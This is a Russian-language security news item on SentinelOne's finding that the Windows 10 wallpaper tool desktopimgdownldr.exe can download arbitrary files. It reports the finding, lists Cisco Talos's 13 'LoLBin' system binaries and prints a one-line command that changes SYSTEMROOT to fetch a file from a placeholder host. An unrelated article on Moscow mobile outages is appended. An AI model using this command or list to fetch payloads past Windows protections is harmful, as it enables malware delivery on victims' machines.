Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

В Москве продолжаются проблемы с мобильной связью в отдельных районах

В выходные проблемы с мобильной связью и интернетом в Москве, начавшиеся 5 марта, сохранялись. При этом зона ограничений сместилась в центральную часть города. Кроме того, сбои затронули сеть Wi-Fi в городском транспорте.

Ранее, 5 марта, ограничения были введены в отдельных районах Южного округа столицы. Тогда связь отсутствовала полностью: не работал не только мобильный интернет, как это обычно бывает, но и голосовая связь. Операторы объяснили происходящее «мерами безопасности».

На следующий день, как сообщил портал «Код Дурова», ограничения сместились в центральную часть Москвы. Они вводятся точечно и затрагивают отдельные участки в пределах нескольких улиц или кварталов, не распространяясь на весь район.

Ограничения также повлияли на работу сети Wi-Fi в общественном транспорте Москвы на некоторых маршрутах и линиях метро. Такая ситуация сохранялась все длинные выходные и продолжается до сих пор.

По данным портала, операторы начали уведомлять абонентов только вечером 6 марта. При этом характер ограничений менялся. 7 марта и позже они затрагивали уже только мобильный интернет, тогда как возможность совершать голосовые звонки и отправлять СМС-сообщения вернулась. При этом мобильный интернет по-прежнему оставался недоступным, а также не работали многие сервисы из «белого списка».

В официальном комментарии пресс-служба Роскомнадзора переадресовала запрос в Минцифры.

RSS: Новости на портале Anti-Malware.ru